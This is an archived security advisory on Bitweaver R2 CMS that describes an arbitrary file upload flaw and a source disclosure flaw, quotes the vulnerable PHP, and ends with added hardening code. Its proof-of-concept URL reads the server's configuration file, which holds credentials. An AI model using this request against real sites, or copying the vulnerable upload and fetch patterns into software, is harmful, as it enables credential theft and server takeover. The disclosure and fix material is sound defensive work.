vendor: Bitweaver R2 CMS
by: AmnPardaz Security Research Team
CVSS: N/A
CWE: Unknown
source code disclosure, arbitrary file upload
Product Name: Bitweaver R2 CMS
Affected Version From: 2 (prior versions also may be affected)
Affected Version To: Unknown
Patch Exists: No
Related CWE: Unknown
CPE: Unknown
Metasploit:
Other Scripts:
Platforms Tested: Unknown

Bitweaver R2 CMS

Bitweaver is an open source content management system. Its speed and power are ideal for large-scale community websites and corporate applications, but it is simple enough for non-technical small site users to set up and administrate. Bitweaver R2 CMS is affected by two vulnerabilities: arbitrary file upload and source code disclosure.

The arbitrary file upload is in the /fisheye/upload.php file, which checks only the content type sent by the client, so an attacker can upload arbitrary files by declaring them with an image/gif content-type. Additionally, the attacker can bypass the '/storage/.htaccess' restriction by uploading their own .htaccess file.

The source code disclosure is in the /wiki/edit.php file, where the suck_url request parameter is passed to file_get_contents() and the fetched content is appended to the end of the current page, so an attacker can point it at a local file.

Mitigation:

No fix is currently available.
Source

Exploit-DB raw data:

########################## WwW.BugReport.ir #########################
#
#      AmnPardaz Security Research Team
#
# Title: Bitweaver R2 CMS
# Vendor: http://www.bitweaver.org
# Bugs: source code disclosure, arbitrary file upload
# Vulnerable Version: 2 (prior versions also may be affected)
# Exploitation: Remote with browser
# Fix Available: No!
################################################################


####################
- Description:
####################

Bitweaver is an open source content management system. Its speed and power are ideal for large-scale community websites and corporate applications, but it is simple enough for non-technical small site users to set up and administrate.

####################
- Vulnerability:
####################

+--> arbitrary file upload

Code Snippet:

/fisheye/upload.php line#32-45

	$i = 0;
	foreach( array_keys( $_FILES ) as $key ) {
		if( preg_match( '/(^image|pdf)/i', $_FILES[$key]['type'] ) ) {
			$upImages[$key] = $_FILES[$key];
			if( !empty( $_REQUEST['imagedata'][$i] ) ) {
				$upData[$key] = $_REQUEST['imagedata'][$i];
			} else {
				$upData[$key] = array();
			}
		} elseif( !empty( $_FILES[$key]['tmp_name'] ) && !empty( $_FILES[$key]['name'] ) ) {
			$upArchives[$key] = $_FILES[$key];
		}
		$i++;
	}

It's possible to upload arbitrary files with image/gif content-type (this can be changed via local proxy or direct content alteration).
It's also possible for an attacker to bypass the "/storage/.htaccess" restriction by uploading his own .htaccess and control server settings.


+-->source code disclosure

Code Snippet:

/wiki/edit.php line#179-195

if( isset( $_REQUEST["suck_url"] ) ) {
	// Suck another page and append to the end of current
	require_once( UTIL_PKG_PATH.'htmlparser/html_parser_inc.php' );
	$suck_url = isset( $_REQUEST["suck_url"] ) ? $_REQUEST["suck_url"] : '';
	$parsehtml = isset( $_REQUEST["parsehtml"] ) ? ( $_REQUEST["parsehtml"] == 'on' ? 'y' : 'n' ): 'n';
	if( isset( $_REQUEST['do_suck'] ) && strlen( $suck_url ) > 0 ) {
		.
		.
		.
		$sdta = @file_get_contents( $suck_url );

POC: http://localhost/bitweaver/wiki/edit.php?page=SandBox&suck_url=./../kernel/config_inc.php&do_suck=h

####################
- Credit :
####################
Original Advisory:http://www.bugreport.ir/?/24
AmnPardaz Security Research Team
Contact: admin[4t}bugreport{d0t]ir
WwW.BugReport.ir
WwW.AmnPardaz.com

# milw0rm.com [2007-12-30]
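
Since no fix is listed, here is one way the two checks quoted above could be hardened. This is an added example, not code from Bitweaver or from the advisory; the function names `safe_upload_name` and `safe_suck_url` and the allow-list are assumptions made for illustration.

```php
<?php
// Added illustration; function names and the allow-list are assumptions, not Bitweaver code.

// Allowed upload types, keyed by the MIME type detected from the file content.
const ALLOWED_UPLOADS = [
    'image/gif'       => 'gif',
    'image/jpeg'      => 'jpg',
    'image/png'       => 'png',
    'application/pdf' => 'pdf',
];

/**
 * Returns a server-chosen storage name for one $_FILES entry, or null to reject it.
 * The client-supplied 'type' and 'name' fields are never trusted.
 */
function safe_upload_name(array $file): ?string {
    if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK
        || !is_uploaded_file($file['tmp_name'])) {
        return null;
    }
    // Detect the type from the bytes on disk instead of $_FILES[...]['type'].
    $mime = (new finfo(FILEINFO_MIME_TYPE))->file($file['tmp_name']);
    if ($mime === false || !isset(ALLOWED_UPLOADS[$mime])) {
        return null;
    }
    // Random name plus fixed extension: no ".htaccess", no ".php", no path parts.
    return bin2hex(random_bytes(16)) . '.' . ALLOWED_UPLOADS[$mime];
}

/**
 * Returns $url only if it is an absolute http(s) URL; otherwise null.
 * Rejects local paths such as "./../kernel/config_inc.php" and other stream wrappers.
 */
function safe_suck_url(string $url): ?string {
    $parts = parse_url($url);
    if ($parts === false || empty($parts['host'])
        || !in_array(strtolower($parts['scheme'] ?? ''), ['http', 'https'], true)) {
        return null;
    }
    return $url;
}

// Constructed inputs: the advisory's relative path, then a remote page.
var_dump(safe_suck_url('./../kernel/config_inc.php'));
var_dump(safe_suck_url('http://example.org/page.html'));
```

Content sniffing alone does not stop a file that is both a valid GIF and contains PHP; the server-chosen name and extension are what keep it from being executed or from replacing .htaccess. Restricting suck_url to http(s) still lets the server fetch internal hosts, so a host allow-list is the stricter option.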